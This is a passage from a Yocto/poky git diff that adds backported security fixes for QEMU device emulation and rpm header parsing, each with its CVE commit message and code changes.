.endpoint = ep, + .length = p->iov.size + }; +- uint8_t buf[p->iov.size]; ++ g_autofree uint8_t *buf = g_malloc(p->iov.size); + /* No id, we look at the ep when receiving a status back */ + usb_packet_copy(p, buf, p->iov.size); + usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet, +@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p, + usbredirparser_send_bulk_packet(dev->parser, p->id, + &bulk_packet, NULL, 0); + } else { +- uint8_t buf[size]; ++ g_autofree uint8_t *buf = g_malloc(size); + usb_packet_copy(p, buf, size); + usbredir_log_data(dev, "bulk data out:", buf, size); + usbredirparser_send_bulk_packet(dev->parser, p->id, +@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev, + USBPacket *p, uint8_t ep) + { + struct usb_redir_interrupt_packet_header interrupt_packet; +- uint8_t buf[p->iov.size]; ++ g_autofree uint8_t *buf = g_malloc(p->iov.size); + + DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep, + p->iov.size, p->id); +-- +GitLab + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch new file mode 100644 index 0000000000..1b4fcbfb60 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch @@ -0,0 +1,29 @@ +vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544) + +Call 'vugbm_buffer_destroy' in error path to avoid resource leak. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang +Reviewed-by: default avatarPrasad J Pandit +Signed-off-by: default avatarLi Qiang +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau +Message-Id: <20210516030403.107723-3-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann + +Upstream-Status: Backport +[vhost-user-gpu does not exist in 4.2.0] +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g, + g_critical("%s: resource creation failed %d %d %d", + __func__, c2d.resource_id, c2d.width, c2d.height); + g_free(res); ++ vugbm_buffer_destroy(&res->buffer); + cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY; + return; + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch new file mode 100644 index 0000000000..36cbb127f8 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch @@ -0,0 +1,39 @@ +vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544) + + +Check whether the 'res' has already been attach_backing to avoid +memory leak. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang +virtio-gpu fix: 204f01b3 + + ("virtio-gpu: fix memory leak + in resource attach backing") + Signed-off-by: default avatarLi Qiang + Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau + Message-Id: <20210516030403.107723-4-liq3ea@163.com> + Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann + +Upstream-Status: Backport +[vhost-user-gpu does not exist in 4.2.0 context] +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster + + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g, + return; + } + ++ if (res->iov) { ++ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC; ++ return; ++ } ++ + ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov); + if (ret != 0) { + cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch new file mode 100644 index 0000000000..c534f4c24f --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch @@ -0,0 +1,39 @@ +vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544) + +If the guest trigger following sequences, the attach_backing will be leaked: + +vg_resource_create_2d +vg_resource_attach_backing +vg_resource_unref + +This patch fix this by freeing 'res->iov' in vg_resource_destroy. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang +virtio-gpu fix: 5e8e3c4c + +("virtio-gpu: fix resource leak +in virgl_cmd_resource_unref") +Reviewed-by: default avatarPrasad J Pandit +Signed-off-by: default avatarLi Qiang +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau +Message-Id: <20210516030403.107723-5-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2021-3544 +[vhost-user-gpu does not exist in the 4.2.0] +Signed-off-by: Armin Kuster + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g, + } + + vugbm_buffer_destroy(&res->buffer); ++ g_free(res->iov); + pixman_image_unref(res->image); + QTAILQ_REMOVE(&g->reslist, res, next); + g_free(res); diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch new file mode 100644 index 0000000000..96e36eb854 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch @@ -0,0 +1,46 @@ +vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544) + +The 'res->iov' will be leaked if the guest trigger following sequences: + +virgl_cmd_create_resource_2d +virgl_resource_attach_backing +virgl_cmd_resource_unref + +This patch fixes this. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang +virtio-gpu fix: 5e8e3c4c + +("virtio-gpu: fix resource leak +in virgl_cmd_resource_unref" +Signed-off-by: default avatarLi Qiang +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau +Message-Id: <20210516030403.107723-6-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g, + struct virtio_gpu_ctrl_command *cmd) + { + struct virtio_gpu_resource_unref unref; ++ struct iovec *res_iovs = NULL; ++ int num_iovs = 0; + + VUGPU_FILL_CMD(unref); + ++ virgl_renderer_resource_detach_iov(unref.resource_id, ++ &res_iovs, ++ &num_iovs); ++ g_free(res_iovs); ++ + virgl_renderer_resource_unref(unref.resource_id); + } + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch new file mode 100644 index 0000000000..e592ce50e2 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch @@ -0,0 +1,47 @@ +From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001 +From: Li Qiang +Date: Sat, 15 May 2021 20:04:01 -0700 +Subject: [PATCH] vhost-user-gpu: fix memory leak in + 'virgl_resource_attach_backing' (CVE-2021-3544) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will +be leaked. + +Fixes: CVE-2021-3544 +Reported-by: Li Qiang +virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak +in resource attach backing") + +Signed-off-by: Li Qiang +Reviewed-by: Marc-André Lureau +Message-Id: <20210516030403.107723-7-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster + +--- + contrib/vhost-user-gpu/virgl.c | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g, + return; + } + +- virgl_renderer_resource_attach_iov(att_rb.resource_id, ++ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id, + res_iovs, att_rb.nr_entries); ++ if (ret != 0) { ++ g_free(res_iovs); ++ } + } + + static void diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch new file mode 100644 index 0000000000..fcdda64437 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch @@ -0,0 +1,41 @@ +From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001 +From: Li Qiang +Date: Sat, 15 May 2021 20:03:56 -0700 +Subject: [PATCH] vhost-user-gpu: fix memory disclosure in + virgl_cmd_get_capset_info (CVE-2021-3545) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Otherwise some of the 'resp' will be leaked to guest. + +Fixes: CVE-2021-3545 +Reported-by: Li Qiang +virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak +in getting capset info dispatch") + +Signed-off-by: Li Qiang +Reviewed-by: Marc-André Lureau +Message-Id: <20210516030403.107723-2-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2021-3545 +Signed-off-by: Armin Kuster + +--- + contrib/vhost-user-gpu/virgl.c | 1 + + 1 file changed, 1 insertion(+) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g, + + VUGPU_FILL_CMD(info); + ++ memset(&resp, 0, sizeof(resp)); + if (info.capset_index == 0) { + resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL; + virgl_renderer_get_cap_set(resp.capset_id, diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch new file mode 100644 index 0000000000..f8da428233 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch @@ -0,0 +1,47 @@ +From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001 +From: Li Qiang +Date: Sat, 15 May 2021 20:04:02 -0700 +Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset' + (CVE-2021-3546) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +If 'virgl_cmd_get_capset' set 'max_size' to 0, +the 'virgl_renderer_fill_caps' will write the data after the 'resp'. +This patch avoid this by checking the returned 'max_size'. + +virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check +virgl capabilities max_size") + +Fixes: CVE-2021-3546 +Reported-by: Li Qiang +Reviewed-by: Prasad J Pandit +Signed-off-by: Li Qiang +Reviewed-by: Marc-André Lureau +Message-Id: <20210516030403.107723-8-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2021-3546 +Signed-off-by: Armin Kuster + +--- + contrib/vhost-user-gpu/virgl.c | 4 ++++ + 1 file changed, 4 insertions(+) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g, + + virgl_renderer_get_cap_set(gc.capset_id, &max_ver, + &max_size); ++ if (!max_size) { ++ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER; ++ return; ++ } + resp = g_malloc0(sizeof(*resp) + max_size); + + resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch new file mode 100644 index 0000000000..7a88e29384 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch @@ -0,0 +1,47 @@ +From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum +Date: Wed, 16 Jun 2021 14:06:00 +0300 +Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device + (CVE-2021-3582) + +Ensure mremap boundaries not trusting the guest kernel to +pass the correct buffer length. + +Fixes: CVE-2021-3582 +Reported-by: VictorV (Kunlun Lab) +Tested-by: VictorV (Kunlun Lab) +Signed-off-by: Marcel Apfelbaum +Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com> +Reviewed-by: Yuval Shaia +Tested-by: Yuval Shaia +Reviewed-by: Prasad J Pandit +Signed-off-by: Marcel Apfelbaum + +CVE: CVE-2021-3582 +Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4] +Signed-off-by: Sakib Sajal +--- + hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c +index f59879e257..da7ddfa548 100644 +--- a/hw/rdma/vmw/pvrdma_cmd.c ++++ b/hw/rdma/vmw/pvrdma_cmd.c +@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma, + return NULL; + } + ++ length = ROUND_UP(length, TARGET_PAGE_SIZE); ++ if (nchunks * TARGET_PAGE_SIZE != length) { ++ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks, ++ (unsigned long)length); ++ return NULL; ++ } ++ + dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE); + if (!dir) { + rdma_error_report("Failed to map to page directory"); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch new file mode 100644 index 0000000000..0547c74484 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch @@ -0,0 +1,43 @@ +From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum +Date: Wed, 30 Jun 2021 14:46:34 +0300 +Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607) + +Check the guest passed a non zero page count +for pvrdma device ring buffers. + +Fixes: CVE-2021-3607 +Reported-by: VictorV (Kunlun Lab) +Reviewed-by: VictorV (Kunlun Lab) +Signed-off-by: Marcel Apfelbaum +Message-Id: <20210630114634.2168872-1-marcel@redhat.com> +Reviewed-by: Yuval Shaia +Tested-by: Yuval Shaia +Signed-off-by: Marcel Apfelbaum + +CVE: CVE-2021-3607 +Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534] +Signed-off-by: Sakib Sajal +--- + hw/rdma/vmw/pvrdma_main.c | 5 +++++ + 1 file changed, 5 insertions(+) + +diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c +index 84ae8024fc..7c0c3551a8 100644 +--- a/hw/rdma/vmw/pvrdma_main.c ++++ b/hw/rdma/vmw/pvrdma_main.c +@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state, + uint64_t *dir, *tbl; + int rc = 0; + ++ if (!num_pages) { ++ rdma_error_report("Ring pages count must be strictly positive"); ++ return -EINVAL; ++ } ++ + dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE); + if (!dir) { + rdma_error_report("Failed to map to page directory (ring %s)", name); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch new file mode 100644 index 0000000000..7055ec3d23 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch @@ -0,0 +1,40 @@ +From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum +Date: Wed, 30 Jun 2021 14:52:46 +0300 +Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Do not unmap uninitialized dma addresses. + +Fixes: CVE-2021-3608 +Reviewed-by: VictorV (Kunlun Lab) +Tested-by: VictorV (Kunlun Lab) +Signed-off-by: Marcel Apfelbaum +Message-Id: <20210630115246.2178219-1-marcel@redhat.com> +Tested-by: Yuval Shaia +Reviewed-by: Yuval Shaia +Reviewed-by: Philippe Mathieu-Daudé +Signed-off-by: Marcel Apfelbaum + +CVE: CVE-2021-3608 +Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3] +Signed-off-by: Sakib Sajal +--- + hw/rdma/vmw/pvrdma_dev_ring.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c +=================================================================== +--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c ++++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c +@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c + atomic_set(&ring->ring_state->cons_head, 0); + */ + ring->npages = npages; +- ring->pages = g_malloc(npages * sizeof(void *)); ++ ring->pages = g_malloc0(npages * sizeof(void *)); + + for (i = 0; i < npages; i++) { + if (!tbl[i]) { diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch new file mode 100644 index 0000000000..50a49233d3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch @@ -0,0 +1,41 @@ +From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann +Date: Thu, 22 Jul 2021 09:27:56 +0200 +Subject: [PATCH] usbredir: fix free call +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +data might point into the middle of a larger buffer, there is a separate +free_on_destroy pointer passed into bufp_alloc() to handle that. It is +only used in the normal workflow though, not when dropping packets due +to the queue being full. Fix that. + +Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491 +Signed-off-by: Gerd Hoffmann +Reviewed-by: Marc-André Lureau +Message-Id: <20210722072756.647673-1-kraxel@redhat.com> + +CVE: CVE-2021-3682 +Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9] +Signed-off-by: Sakib Sajal +--- + hw/usb/redirect.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c +index 4ec9326e05..1ec909a63a 100644 +--- a/hw/usb/redirect.c ++++ b/hw/usb/redirect.c +@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len, + if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) { + if (dev->endpoint[EP2I(ep)].bufpq_size > + dev->endpoint[EP2I(ep)].bufpq_target_size) { +- free(data); ++ free(free_on_destroy); + return -1; + } + dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0; +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch index 6454785254..dc3f74fecd 100644 --- a/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch +++ b/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch @@ -11,36 +11,39 @@ CPU thread. Upstream-Status: Pending [merge of multithreading patches to upstream] Signed-off-by: Peter Bergin +Signed-off-by: Ranjitsinh Rathod --- - rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++ - 1 file changed, 34 insertions(+) + rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++ + 1 file changed, 36 insertions(+) diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c index e051c98..b3c56b6 100644 --- a/rpmio/rpmio.c +++ b/rpmio/rpmio.c -@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz) +@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz) } #endif -+ struct rlimit virtual_memory; -+ getrlimit(RLIMIT_AS, &virtual_memory); -+ if (virtual_memory.rlim_cur != RLIM_INFINITY) { ++ struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY}; ++ int status = getrlimit(RLIMIT_AS, &virtual_memory); ++ if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) { + const uint64_t virtual_memlimit = virtual_memory.rlim_cur; ++ uint32_t threads_max = lzma_cputhreads(); + const uint64_t virtual_memlimit_per_cpu_thread = -+ virtual_memlimit / lzma_cputhreads(); -+ uint64_t memory_usage_virt; ++ virtual_memlimit / ((threads_max == 0) ? 1 : threads_max); + rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and " + "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread); ++ uint64_t memory_usage_virt; + /* keep reducing the number of compression threads until memory + usage falls below the limit per CPU thread*/ + while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) > + virtual_memlimit_per_cpu_thread) { -+ /* If number of threads goes down to zero lzma_stream_encoder will -+ * will return UINT64_MAX. We must check here to avoid an infinite loop. ++ /* If number of threads goes down to zero or in case of any other error ++ * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check ++ * for both the cases here to avoid an infinite loop. + * If we get into situation that one thread requires more virtual memory + * than available we set one thread, print error message and try anyway. */ -+ if (--mt_options.threads == 0) { ++ if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) { + mt_options.threads = 1; + rpmlog(RPMLOG_WARNING, + "XZ: Could not adjust number of threads to get below " diff --git a/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch b/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch new file mode 100644 index 0000000000..f2fc47e321 --- /dev/null +++ b/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch @@ -0,0 +1,109 @@ +From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001 +From: Demi Marie Obenour +Date: Mon, 8 Feb 2021 16:05:01 -0500 +Subject: [PATCH] hdrblobInit() needs bounds checks too + +Users can pass untrusted data to hdrblobInit() and it must be robust +against this. + +Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef + +Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15] +CVE: CVE-2021-20266 +Signed-off-by: Ranjitsinh Rathod + +--- + lib/header.c | 48 +++++++++++++++++++++++++++++++----------------- + 1 file changed, 31 insertions(+), 17 deletions(-) + +diff --git a/lib/header.c b/lib/header.c +index 5b09f8352..ad5b6dc57 100644 +--- a/lib/header.c ++++ b/lib/header.c +@@ -11,6 +11,7 @@ + #include "system.h" + #include + #include ++#include + #include + #include + #include "lib/header_internal.h" +@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob) + return NULL; + } + ++static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl, ++ char **emsg) { ++ uint32_t il_max = HEADER_TAGS_MAX; ++ uint32_t dl_max = HEADER_DATA_MAX; ++ if (regionTag == RPMTAG_HEADERSIGNATURES) { ++ il_max = 32; ++ dl_max = 8192; ++ } ++ if (hdrchkRange(il_max, il)) { ++ rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il); ++ return RPMRC_FAIL; ++ } ++ if (hdrchkRange(dl_max, dl)) { ++ rasprintf(emsg, _("hdr data: BAD, no. of bytes(%" PRIu32 ") out of range"), dl); ++ return RPMRC_FAIL; ++ } ++ return RPMRC_OK; ++} ++ + rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg) + { + int32_t block[4]; +@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl + size_t nb; + rpmRC rc = RPMRC_FAIL; /* assume failure */ + int xx; +- int32_t il_max = HEADER_TAGS_MAX; +- int32_t dl_max = HEADER_DATA_MAX; +- +- if (regionTag == RPMTAG_HEADERSIGNATURES) { +- il_max = 32; +- dl_max = 8192; +- } + + memset(block, 0, sizeof(block)); + if ((xx = Freadall(fd, bs, blen)) != blen) { +@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl + goto exit; + } + il = ntohl(block[2]); +- if (hdrchkRange(il_max, il)) { +- rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il); +- goto exit; +- } + dl = ntohl(block[3]); +- if (hdrchkRange(dl_max, dl)) { +- rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl); ++ if (hdrblobVerifyLengths(regionTag, il, dl, emsg)) + goto exit; +- } + + nb = (il * sizeof(struct entryInfo_s)) + dl; + uc = sizeof(il) + sizeof(dl) + nb; +@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc, + struct hdrblob_s *blob, char **emsg) + { + rpmRC rc = RPMRC_FAIL; +- + memset(blob, 0, sizeof(*blob)); ++ if (uc && uc < 8) { ++ rasprintf(emsg, _("hdr length: BAD")); ++ goto exit; ++ } ++ + blob->ei = (int32_t *) uh; /* discards const */ +- blob->il = ntohl(blob->ei[0]); +- blob->dl = ntohl(blob->ei[1]); ++ blob->il = ntohl((uint32_t)(blob->ei[0])); ++ blob->dl = ntohl((uint32_t)(blob->ei[1])); ++ if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK) ++ goto exit; ++ + blob->pe = (entryInfo) &(blob->ei[2]); + blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) + + (blob->il * sizeof(*blob->pe)) + blob->dl; diff --git a/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb b/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb index 018b2f8700..c39a5208e5 100644 --- a/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb +++ b/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb @@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org" LICENSE = "GPL-2.0" LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a" -SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \ +SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \ file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \ file://0001-Do-not-read-config-files-from-HOME.patch \ file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \ @@ -45,6 +45,7 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \ file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \ file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \ file://CVE-2021-3421.patch \ + file://CVE-2021-20266.patch \ " PE = "1" @@ -61,7 +62,8 @@ export PYTHON_ABI # OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe EXTRA_AUTORECONF_append = " --exclude=gnu-configize" -EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl" +# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages +EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc" EXTRA_OECONF_append_libc-musl = " --disable-nls" # --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs diff --git a/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch new file mode 100644 index 0000000000..95e2534ee4 --- /dev/null +++ 